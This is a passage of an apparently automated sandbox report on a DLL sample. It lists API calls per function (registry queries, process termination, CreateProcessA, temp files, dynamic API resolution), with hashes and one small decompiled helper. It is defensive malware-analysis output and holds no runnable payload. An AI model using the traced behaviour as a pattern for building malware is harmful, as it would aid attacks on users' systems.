                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                • SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                • HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                • String ID:
                • API String ID: 1835239314-0
                • Opcode ID: 3eff8ce2dadfa5a0f48f26e67d832aa2a8be3d935e85d79b0af435b18ca33f3b
                • Instruction ID: 9cf6a0fb10b65fa1555db7bdddfb3b3dcc6f1c060647554adeadcc60ca2ca8a6
                • Opcode Fuzzy Hash: 3eff8ce2dadfa5a0f48f26e67d832aa2a8be3d935e85d79b0af435b18ca33f3b
                • Instruction Fuzzy Hash: FC312F71D00209EBCF20DF96C989CAFBBB9EB94755B148015F505A7200F734AE40CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,046D9A91,00000000,?,046EE17C,?,?,046EE218), ref: 046D4E9D
                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,046D9A91,00000000,?,046EE17C,?,?,046EE218), ref: 046D4EAE
                  • Part of subcall function 046CAAD8: lstrlen.KERNEL32(046D79F2,?,00000000,00000000,?,046D79F2,00000000,?,00000001,00000000,00000001), ref: 046CAAEA
                  • Part of subcall function 046CAAD8: StrChrA.SHLWAPI(00000001,0000000D,?,046D79F2,00000000,?,00000001,00000000,00000001), ref: 046CAB22
                • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 046D4EEE
                • memcpy.NTDLL(00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C,?), ref: 046D4F1B
                • memcpy.NTDLL(00000000,046EE218,046EE218,00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C,?), ref: 046D4F2A
                • memcpy.NTDLL(046EE218,?,?,00000000,046EE218,046EE218,00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C), ref: 046D4F3C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 83bc782b211a7126300d42286a853eb2aeaa461c988b53bef4330afc9adb7f8b
                • Instruction ID: b82671ca4974ee7c77c64af5236e2dda757c45090b9f5f209fe7da3847d3dc6f
                • Opcode Fuzzy Hash: 83bc782b211a7126300d42286a853eb2aeaa461c988b53bef4330afc9adb7f8b
                • Instruction Fuzzy Hash: AF213972A0020ABFDB10DF95CC84F9ABBE8EF58654F054056E908DB251FA71EE448BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 046C94AF
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C94C0
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 046C94DB
                • GetLastError.KERNEL32(?,?,?,?), ref: 046C94F1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046C9503
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046C9518
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                • String ID:
                • API String ID: 1822509305-0
                • Opcode ID: 6ec4a36f8d1b980471bae4010724f3041efc264e8adf0baad19e6a8a9e85fbc7
                • Instruction ID: 33912e8a037cad62c2b500fbeadfe84701564f814d3d1c264f4c3cdea77d71b2
                • Opcode Fuzzy Hash: 6ec4a36f8d1b980471bae4010724f3041efc264e8adf0baad19e6a8a9e85fbc7
                • Instruction Fuzzy Hash: 80117C76901128FBDF226B96DC48CEF7FBEEF45390B004021F504A6110E6369E65EBB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 046D1FD6
                • _strupr.NTDLL ref: 046D2011
                • lstrlen.KERNEL32(00000000), ref: 046D2019
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 046D2058
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 046D205F
                • GetLastError.KERNEL32 ref: 046D2067
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                • String ID:
                • API String ID: 110452925-0
                • Opcode ID: 2361693c24650568eb4f137d325a9fb306316afb35586ad649fdbc4eda31631a
                • Instruction ID: 192546af4e161ec66c619da57f892b62e5b110a1d69199d3f78f45b0cdfa3d09
                • Opcode Fuzzy Hash: 2361693c24650568eb4f137d325a9fb306316afb35586ad649fdbc4eda31631a
                • Instruction Fuzzy Hash: 3611C4B1900204EFDB217B719C9CD7E37ADEB98714B001455FA02DB140FA79A841CB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,74E5F710), ref: 046C559C
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 046C55CA
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046C55DC
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 046C5601
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C561C
                • RegCloseKey.ADVAPI32(?), ref: 046C5626
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                • String ID:
                • API String ID: 170146033-0
                • Opcode ID: e796e6dcfd18b370188e2eb6d9f971624cf5ac507c2c076d606756bd7125570d
                • Instruction ID: c2f11574ab21db65f9a868b1dc9e23a765497f7a1cc307f5052e2425f609ebe2
                • Opcode Fuzzy Hash: e796e6dcfd18b370188e2eb6d9f971624cf5ac507c2c076d606756bd7125570d
                • Instruction Fuzzy Hash: 0C1108B6900119FFDB11DB96DD88CAEBBFDEB48644B001069E901A6121F7366E55DF20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE2
                • lstrlen.KERNEL32(?,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE9
                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 046DFCFB
                • _snprintf.NTDLL ref: 046DFD21
                  • Part of subcall function 046E2BDD: memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046E2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                  • Part of subcall function 046E2BDD: wcstombs.NTDLL ref: 046E2C35
                  • Part of subcall function 046E2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                  • Part of subcall function 046E2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CEF
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CF4
                • _snprintf.NTDLL ref: 046DFD55
                  • Part of subcall function 046E2BDD: GetLastError.KERNEL32 ref: 046E2CC0
                  • Part of subcall function 046E2BDD: GetExitCodeProcess.KERNEL32(?,00000001), ref: 046E2CE0
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 046DFD72
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                • String ID:
                • API String ID: 1481739438-0
                • Opcode ID: cb972f4f72e595c688dbebf23936f0a5c1c658e70bae13cdf32796e9f835f327
                • Instruction ID: 00eada35d6832c3a936589085375c7db8181905e6ffa1f5ca95ed6d763affab7
                • Opcode Fuzzy Hash: cb972f4f72e595c688dbebf23936f0a5c1c658e70bae13cdf32796e9f835f327
                • Instruction Fuzzy Hash: 2711D076A00219BFCB11AF66DC44D9E3FADEB04364B108056FD0A9B211E735EE50DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,046C895C), ref: 046D8F93
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FB2
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FC7
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FDD
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FF3
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D9009
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateHeapLibraryLoad
                • String ID:
                • API String ID: 2486251641-0
                • Opcode ID: abc534235232c73b045284d4445de35927139f22aa596cc7e65587f8f1583007
                • Instruction ID: 84b70302c1dce59f04ef41e1e43f672cef7adb3b023695ab94c3c84503621795
                • Opcode Fuzzy Hash: abc534235232c73b045284d4445de35927139f22aa596cc7e65587f8f1583007
                • Instruction Fuzzy Hash: 3C113DB2A0120B9F9720EF79EC88D6233ECEB09744305556AE549DB212F736F8059F60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7014
                • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 046D7027
                • lstrcpy.KERNEL32(00000008,?), ref: 046D7049
                • GetLastError.KERNEL32(046C209B,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7072
                • HeapFree.KERNEL32(00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D708A
                • CloseHandle.KERNEL32(00000000,046C209B,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7093
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                • String ID:
                • API String ID: 2860611006-0
                • Opcode ID: f57a35f8d5df6f38ae1a9fb5492e23d67c56f0f3240dad9c5e539cbdfb6e8e68
                • Instruction ID: 43858ee57169a2e627a75fcf3857719d12ffd8dee6d0809390cb102861a3af83
                • Opcode Fuzzy Hash: f57a35f8d5df6f38ae1a9fb5492e23d67c56f0f3240dad9c5e539cbdfb6e8e68
                • Instruction Fuzzy Hash: D6119675500205EFDB10AFA6DC848AFBBE8FB54361700442AF815C7280F735AD55DB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                • GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                • lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 1175089793-0
                • Opcode ID: 673d8310c1a1672861388f0e17d157459d410f51b6d1b9206dc2dabe2bff3f83
                • Instruction ID: 7646ffeafb74310a6daabdb1d8094a54febc6d96f07ebebc99154c1f36c4156f
                • Opcode Fuzzy Hash: 673d8310c1a1672861388f0e17d157459d410f51b6d1b9206dc2dabe2bff3f83
                • Instruction Fuzzy Hash: DA014832900215AB97116B669C48D6F7BECDFD5755B190017F905E7201FA74FC058BB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastmemset
                • String ID: vids
                • API String ID: 3276359510-3767230166
                • Opcode ID: 5ba3975c7c7e44dd69bf214a3c121db6786798eac9b424cea2fdcf086da11f51
                • Instruction ID: 22cda851f9b1808260c5d4bad7edefd737665df79f8bff49827979abf17838b9
                • Opcode Fuzzy Hash: 5ba3975c7c7e44dd69bf214a3c121db6786798eac9b424cea2fdcf086da11f51
                • Instruction Fuzzy Hash: 9281F7B1D012299FDF20DFA4D9849ADBBB9FF48710F10816AF415EB250E735AA41CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DE47D
                • lstrlen.KERNEL32(?), ref: 046DE4AE
                • memcpy.NTDLL(00000008,?,00000001), ref: 046DE4BD
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DE53C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlenmemcpy
                • String ID: W
                • API String ID: 379260646-655174618
                • Opcode ID: d161554e3409ea3d83d0ab06722990269c161c85d553b66ebefdfc021ff25dd1
                • Instruction ID: b5b3b7e0f9b8a184a1db7099edecf00d84a3c4b31e661dfcdaf42f0c280e14bb
                • Opcode Fuzzy Hash: d161554e3409ea3d83d0ab06722990269c161c85d553b66ebefdfc021ff25dd1
                • Instruction Fuzzy Hash: D341B230A00B09DBDB248F19D8847E677E6EB29344F08942EE4498F350F377B996CB56
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046CD734
                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 046CD79B
                • GetLastError.KERNEL32(?,00000000,00000000), ref: 046CD7A5
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: BuffersErrorFileFlushLastmemset
                • String ID: K$P
                • API String ID: 3817869962-420285281
                • Opcode ID: cbd3e211658ab09f0f6975b5e022b51935740676f92d1041033a888f7d1500b3
                • Instruction ID: 2fbdf7c57ca2bdd6d35fde5edd4c86ab52682e502cdeb8bd52a9eb1334082c16
                • Opcode Fuzzy Hash: cbd3e211658ab09f0f6975b5e022b51935740676f92d1041033a888f7d1500b3
                • Instruction Fuzzy Hash: 61416C70A006059FDB24DFA8C9846BBBBF1FF64B04F54483DD59693680E334B904CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,046D3804,00000000,?,?,?,046D3804,?,?,?,?,?), ref: 046E2F37
                • lstrlen.KERNEL32(046D3804,?,?,?,046D3804,?,?,?,?,?), ref: 046E2F55
                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 046E2FC4
                • lstrlen.KERNEL32(046D3804,00000000,00000000,?,?,?,046D3804,?,?,?,?,?), ref: 046E2FE5
                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 046E2FF9
                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 046E3002
                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 046E3010
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$FreeLocal
                • String ID:
                • API String ID: 1123625124-0
                • Opcode ID: 089b4f711cb403cc2241636c5ff2e37c439f0f012be849e48a36254ecb85b9dc
                • Instruction ID: 08f72e2c3aa8d37e882ee1b1ae18f640eb3508732ce6ebbc5eda058de19f05b4
                • Opcode Fuzzy Hash: 089b4f711cb403cc2241636c5ff2e37c439f0f012be849e48a36254ecb85b9dc
                • Instruction Fuzzy Hash: EB41E5B290121AAFDF11DF66DD458EE3BA9EF14364B044069FD04A7210F732EE649BE1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                 			void** E01C13F8C() {
                 				void* _v0; // incoming value stored into the global object (decompiler's _v0)
                 				void** _t1;
                 				void** _t3;
                 				void** _t5;
                 				void** _t7;
                 				void** _t8;
                 				void* _t10;
                 
                 				// global object pointer at 0x1c1a384; a CRITICAL_SECTION is embedded at index 0x10
                 				_t3 =  *(void***)0x1c1a384; // 0x21795b0
                 				RtlEnterCriticalSection( &(_t3[0x10]));
                 				// spin until the busy flag at index 0x16 is cleared, sleeping 10 ms per iteration
                 				while(1) {
                 					_t5 =  *(void***)0x1c1a384; // 0x21795b0
                 					_t1 =  &(_t5[0x16]); // 0x0
                 					if( *_t1 == 0) {
                 						break;
                 					}
                 					Sleep(0xa);
                 				}
                 				_t7 =  *(void***)0x1c1a384; // 0x21795b0
                 				_t10 =  *_t7;
                 				// release the previous buffer unless it is null or the static default at 0x1c1b823
                 				if(_t10 != 0 && _t10 != (void*)0x1c1b823) {
                 					HeapFree( *(HANDLE*)0x1c1a290, 0, _t10);
                 					_t7 =  *(void***)0x1c1a384; // 0x21795b0
                 				}
                 				 *_t7 = _v0;
                 				_t8 =  &(_t7[0x10]);
                 				RtlLeaveCriticalSection(_t8);
                 				return _t8;
                 			}


                APIs
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C13F95
                • Sleep.KERNEL32(0000000A), ref: 01C13F9F
                • HeapFree.KERNEL32(00000000), ref: 01C13FCD
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C13FE2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                 • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                 • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 9004d40878f8ac4f5d0852e72b9e4139198a8c1e5c78cf8ac6fe9ae2bf19c0a9
                • Instruction ID: 0d9c25e787342e605392ad397a09bf4326c8b60c4a56ca382e908caf72c096c2
                • Opcode Fuzzy Hash: 9004d40878f8ac4f5d0852e72b9e4139198a8c1e5c78cf8ac6fe9ae2bf19c0a9
                • Instruction Fuzzy Hash: EFF0D4742C1280DFE7298B28D99DB293BB5BB2BB19B04014CF94B87799D774E810DB15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4BB
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4D8
                • lstrlenW.KERNEL32(?,00000000,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B67
                • lstrlenW.KERNEL32(00000008,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B6E
                • lstrlenW.KERNEL32(?,?,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B8C
                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046C5C4A
                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046C5C55
                • wsprintfA.USER32 ref: 046C5C97
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                • String ID:
                • API String ID: 1727939831-0
                • Opcode ID: a5eed24b694e0b02ac327753cfabab6d39cf3209c99dbcd64dd539f935850c7d
                • Instruction ID: 0b61e8a28b248d5a10c3eb8c6893f030b3af7bba5bd6a61bace2b562ee67c08a
                • Opcode Fuzzy Hash: a5eed24b694e0b02ac327753cfabab6d39cf3209c99dbcd64dd539f935850c7d
                • Instruction Fuzzy Hash: E9518C7190021ABFDB01AFA5CD889BE7BFAEF48204B04406DE915A7221FB35F9119B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 046E4C5D
                • memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 046E4CF0
                • GetLastError.KERNEL32(?,?,0000011F,?,00000110,?), ref: 046E4D48
                • GetLastError.KERNEL32(?,00000110,?), ref: 046E4D7A
                • GetLastError.KERNEL32(?,00000110,?), ref: 046E4D8E
                • GetLastError.KERNEL32(?,00000110,?,?,?,?,?,?,?,?,?,?,?,046C21D6,00000000,?), ref: 046E4DA3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$memcpy
                • String ID:
                • API String ID: 2760375183-0
                • Opcode ID: 856319ca8f7c3f96733c4d962d7815832f0caa907b2533a0a068d52e7755da42
                • Instruction ID: 539552ba2d58126b6b6af28d3f09c3be819ee7a21ef7779314092e579c15dae2
                • Opcode Fuzzy Hash: 856319ca8f7c3f96733c4d962d7815832f0caa907b2533a0a068d52e7755da42
                • Instruction Fuzzy Hash: E8515FB1901209FFDB10DFA6D884AEEBBF9EB44750F008426F901E7240F775AE109B61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(?,00000020), ref: 046D25CC
                • lstrcat.KERNEL32(?,00000020), ref: 046D25E1
                • lstrcmp.KERNEL32(00000000,?), ref: 046D25F8
                • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 046D261C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: d69ae8b3fcbd3fa0a524a26ae85bb03db11c23e9f08178a38c8009a6812ebd1e
                • Instruction ID: b5de0347b71eb952c861e8cbdce1729adb64a8e013d2fff91f05bcb5503f5b0d
                • Opcode Fuzzy Hash: d69ae8b3fcbd3fa0a524a26ae85bb03db11c23e9f08178a38c8009a6812ebd1e
                • Instruction Fuzzy Hash: 2951B371E00208EFDF21CF99C8A4AADBBB5FF65315F04809AE8559B311E770BA52DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                • WaitForSingleObject.KERNEL32(00000000,?,04C99998,?,00000000,00000000,00000001), ref: 046D6708
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046D6742
                • RegCloseKey.ADVAPI32(?), ref: 046D676E
                • WaitForSingleObject.KERNEL32(00000000,Function_0000E2C5,046EE374), ref: 046D67D2
                • RtlExitUserThread.NTDLL(?), ref: 046D6808
                  • Part of subcall function 046D680F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,046DDB2C,00000000,?,?), ref: 046D682D
                  • Part of subcall function 046D680F: GetFileSize.KERNEL32(00000000,00000000,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?), ref: 046D683D
                  • Part of subcall function 046D680F: CloseHandle.KERNEL32(000000FF,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000), ref: 046D689F
